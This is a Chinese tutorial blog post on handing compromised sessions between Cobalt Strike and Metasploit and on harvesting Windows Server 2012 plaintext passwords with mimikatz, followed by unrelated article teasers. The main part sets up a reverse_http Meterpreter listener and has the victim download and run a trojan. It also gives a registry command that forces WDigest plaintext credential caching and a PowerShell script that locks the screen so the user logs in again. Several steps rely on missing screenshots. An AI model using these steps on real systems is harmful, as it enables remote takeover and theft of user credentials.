cs与msf权限传递,以及mimikatz抓取win2012明文密码

目录

解释参数

foreign http

foreign https

cs与msf权限传递

Cobalt Strike会话传递到Metasploit Framework

Cobalt strike上的操作

​编辑​编辑​编辑

Metasploit Framework上的操作

传递会话

Metasploit Framework会话传递到Cobalt Strike

Cobalt strike上的操作

Metasploit Framework上的操作

传递会话

mimikatz获取win2012 明文密码

Cobalt strike上的操作

Metasploit Framework上的操作

解释参数

foreign http

将目标权限通过http的方式外派给metasploit或empire

通俗易懂 就是用来cs 传递shell 的(http)

foreign https

将目标权限通过https的方式外派给metasploit或empire

通俗易懂 就是用来cs 传递shell 的(https)

cs与msf权限传递

Cobalt Strike会话传递到Metasploit Framework

Cobalt strike上的操作

1、进入cs界面,首先来到 Cobalt Strike 目录下,启动 Cobalt Strike 服务端(我的cs在这个目录下)

2、用客户端进

3、建立监听

4、生成脚本文件

5、开启服务,让win_2012 下载木马文件并运行

6、显示已经获取到了win的权限

Metasploit Framework上的操作

8、进去msf msfconsole

9、在 Metasploit Framework 上调用 handler 模块

use explpit/multi/handler

10、监听

set payload windows/meterpreter/reverse_http
set lhost 192.168.111.141 
set lport 4444
run

传递会话

11、在 Cobalt strike上先创建一个 Foreign HTTP 监听(注意必须得跟msf设置的端口一致)

11、之后在 Cobalt strike 上右击待传递的会话选择 Spawn ,选择刚刚创建的 Foreign HTTP 监听

12、传参完毕

Metasploit Framework会话传递到Cobalt Strike

Cobalt strike上的操作

1、这里选择的是 HTTPS Beacon,添加上主机IP,点击保存,即可创建一个 HTTPS Beacon

Metasploit Framework上的操作

(mimikatz 抓明文密码 1,2 步以详细说明)

传递会话

1、退回 handler 目录下(background)

2、进入inject 敲以下命令(session 1 必须跟 background 之后那个session 得保持一致)

3、查看cs的权限(已经传递)

mimikatz获取win2012 明文密码

Cobalt strike上的操作

1、先抓一次密码(发现是密码是null)

2、可以通过修改注册表来让Wdigest Auth保存明文口令:reg add "HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f

3、修改注册表之后,需要用户重新登录才可以生效(把如下代码保存为lock-screen.ps1)

Function Lock-WorkStation {

$signature = @"

[DllImport("user32.dll", SetLastError = true)]

public static extern bool LockWorkStation();

"@

$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru

$LockWorkStation::LockWorkStation() | Out-Null

}

Lock-WorkStation

4、用win 下载 生成的文件(并运行)

5、重新输入密码就可以获取明文密码

Metasploit Framework上的操作

1、生成木马文件(我之前生成过)


2、用msf监听

3、获取明文密码 

kail 开启下载

win 下载(四个全下载,运行程序)

返回kail端(execute -i -f mimikatz.exe 进入mimikatz)

查看权限(必须为system才可以查到)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/644125.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

rk3568_atomic

rk3568_atomic

文章目录 前言一、atomic是什么?二、原子操作API函数1.atomic原子操作2.原子位操作API三、atomic驱动实验总结前言 本文记录的是正点原子rk3568开发板的atomic实验 一、atomic是什么? 不同的线程在进行读写的过程中,可能会冲突乱入,导致会有预想不到的结果。所以为了让数…
阅读更多...
如何进行异地多地兼容组网设置?

如何进行异地多地兼容组网设置?

跨地区工作、远程办公和异地合作已成为常态。由于网络限制和安全性要求,远程连接仍然是一个具有挑战性的问题。为了解决这一难题,各行各业都在寻找一种能在异地多地兼容的组网设置方案。本文将着重介绍基于【天联】的组网解决方案,探讨其操作…
阅读更多...
Unity | 框架MVC

Unity | 框架MVC

目录 一、MVC介绍 二、搭建UI界面 三、代码实现 1.Model层 2.View层 3.Controller层 四、MVC框架测试 五、知识补充 一、MVC介绍 model:数据层。界面展示的数据(需要进行初始化、更新、保存、事件通知等操作),单例模式&am…
阅读更多...
flutter 实现旋转星球

flutter 实现旋转星球

先看效果 planet_widget.dart import dart:math; import package:flutter/material.dart; import package:vector_math/vector_math_64.dart show Vector3; import package:flutter/gestures.dart; import package:flutter/physics.dart;class PlanetWidget extends StatefulW…
阅读更多...
内网穿透--Spp-特殊协议-上线

内网穿透--Spp-特殊协议-上线

免责声明:本文仅做技术交流与学习... 目录 spp项目: 一图通解: 1-下载spp 2-服务端执行命令 3-客户端执行命令 4-服务端cs监听&生马 spp项目: GitHub - esrrhs/spp: A simple and powerful proxy 支持的协议:tcp、udp、udp、icmp、http、kcp、quic 支持的…
阅读更多...
什么是健康信息卡

什么是健康信息卡

健康档案信息卡是交由居民本人保管的个人健康信息卡片。 其内容包括:居民个人主要基本信息、健康档案编码、患有的重要疾病、过敏史以及紧急情况下的联系人及联系方式,还有所属基层医疗机构的责任医生、护士及联系电话等。它主要用于居民在复诊、转诊或接…
阅读更多...
HTML+CSS 玻璃按钮

HTML+CSS 玻璃按钮

效果演示 Code <!DOCTYPE html> <html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>玻璃按钮</title><li…
阅读更多...
Distributed Transactions Mit 6.824

Distributed Transactions Mit 6.824

Topic1&#xff1a;distributed transactions concurrency control atomic commit 传统计划&#xff1a;事务 程序员标记代码序列的开始/结束作为事务。 事务示例 x 和 y 是银行余额——数据库表中的记录。x 和 y 位于不同的服务器上&#xff08;可能在不同的银行&#x…
阅读更多...
【Linux网络】端口及UDP协议

【Linux网络】端口及UDP协议

文章目录 1.再看四层2.端口号2.1引入linux端口号和进程pid的区别端口号是如何生成的传输层有了pid还设置端口号端口号划分 2.2问题2.3netstat 3.UDP协议3.0每学一个协议 都要讨论一下问题3.1UDP协议3.2谈udp/tcp实际上是在讨论什么&#xff1f; 1.再看四层 2.端口号 端口号(Po…
阅读更多...
Servlet 的 API

Servlet 的 API

HttpServlet init&#xff1a;当 tomcat 收到了 /hello 这样的路径是请求后就会调用 HelloServlet&#xff0c;于是就需要对 HelloServlet 进行实例化&#xff08;只实例一次&#xff0c;后续再有请求也不实例了&#xff09;。 destory&#xff1a;如果是通过 smart tomcat 的停…
阅读更多...
存在重复元素 II[简单]

存在重复元素 II[简单]

优质博文&#xff1a;IT-BLOG-CN 一、题目 给你一个整数数组nums和一个整数k&#xff0c;判断数组中是否存在两个不同的索引i和j&#xff0c;满足nums[i] nums[j]且abs(i - j) < k。如果存在&#xff0c;返回true&#xff1b;否则&#xff0c;返回false。 示例 1&#…
阅读更多...
Netty初识Hello World 事件循环对象(EventLoop) 事件循环组 (EventLoopGroup)

Netty初识Hello World 事件循环对象(EventLoop) 事件循环组 (EventLoopGroup)

初始Netty-HelloWorld Netty在网络通信中的地位就如同Spring框架在JavaEE开发中的地位。 基于Netty网络通信开发简易的服务端、客户端&#xff0c;以实现客户端向服务端发送hello world&#xff0c;服务端仅接收不返回数据。 服务端代码&#xff1a; Slf4j public class Hell…
阅读更多...
ICML2024 定义新隐私保护升级:DP-BITFIT新型微调技术让AI模型学习更安全

ICML2024 定义新隐私保护升级:DP-BITFIT新型微调技术让AI模型学习更安全

DeepVisionary 每日深度学习前沿科技推送&顶会论文分享&#xff0c;与你一起了解前沿深度学习信息&#xff01; 引言&#xff1a;差分隐私在大模型微调中的重要性和挑战 在当今的深度学习领域&#xff0c;大型预训练模型的微调已成为提高各种任务性能的关键技术。然而&am…
阅读更多...
开放式耳机哪个品牌音质好用又实惠耐用?五大公认卷王神器直入!

开放式耳机哪个品牌音质好用又实惠耐用?五大公认卷王神器直入!

​在现今耳机市场&#xff0c;开放式耳机凭借其舒适的佩戴体验和独特的不入耳设计&#xff0c;备受消费者追捧。它们不仅让你在享受音乐时&#xff0c;仍能察觉周围的声音&#xff0c;确保与人交流无障碍&#xff0c;而且有利于耳朵的卫生与健康。对于运动爱好者和耳机发烧友而…
阅读更多...
AI大模型探索之路-实战篇7:Function Calling技术实战:自动生成函数

AI大模型探索之路-实战篇7:Function Calling技术实战:自动生成函数

系列篇章&#x1f4a5; AI大模型探索之路-实战篇4&#xff1a;深入DB-GPT数据应用开发框架调研 AI大模型探索之路-实战篇5&#xff1a;探索Open Interpreter开放代码解释器调研 AI大模型探索之路-实战篇6&#xff1a;掌握Function Calling的详细流程 目录 系列篇章&#x1f4a…
阅读更多...
Centos修改系統語言

Centos修改系統語言

一、使用命令行修系统语言 1、显示系统当前语言环 [rootkvm-suma ~]# localectl System Locale: LANGen_US.utf8 VC Keymap: cn X11 Layout: cn 2、查看系统支持字符集 [rootkvm-suma ~]# locale -a 2、设置系统语言环境 [rootkvm-suma ~]# localectl set-locale LANGz…
阅读更多...
Gradio 搭建yolov8 分类系统

Gradio 搭建yolov8 分类系统

代码 import gradio as gr import pandas as pd from ultralytics import YOLO from skimage import data from PIL import Imagemodel YOLO(yolov8n-cls.pt) def predict(img):logging.info("Gradio 调用开始")result model.predict(sourceimg)logging.info("…
阅读更多...
机器学习预测-CNN手写字识别

机器学习预测-CNN手写字识别

介绍 这段代码是使用PyTorch实现的卷积神经网络&#xff08;CNN&#xff09;&#xff0c;用于在MNIST数据集上进行图像分类。让我一步步解释&#xff1a; 导入库&#xff1a;代码导入了必要的库&#xff0c;包括PyTorch&#xff08;torch&#xff09;、神经网络模块&#xff0…
阅读更多...
【Linux】Linux的安装

【Linux】Linux的安装

文章目录 一、Linux环境的安装虚拟机 镜像文件云服务器&#xff08;可能需要花钱&#xff09; 未完待续 一、Linux环境的安装 我们往后的学习用的Linux版本为——CentOs 7 &#xff0c;使用 Ubuntu 也可以 。这里提供几个安装方法&#xff1a; 电脑安装双系统&#xff08;不…
阅读更多...
LeetCode热题100——矩阵

LeetCode热题100——矩阵

73.矩阵清零 题目 给定一个 *m* x *n* 的矩阵&#xff0c;如果一个元素为 0 &#xff0c;则将其所在行和列的所有元素都设为 0 。请使用 原地 算法。 示例 1&#xff1a; 输入&#xff1a;matrix [[1,1,1],[1,0,1],[1,1,1]] 输出&#xff1a;[[1,0,1],[0,0,0],[1,0,1]] 示例…
阅读更多...
最新文章

Copyright @ 2022~2023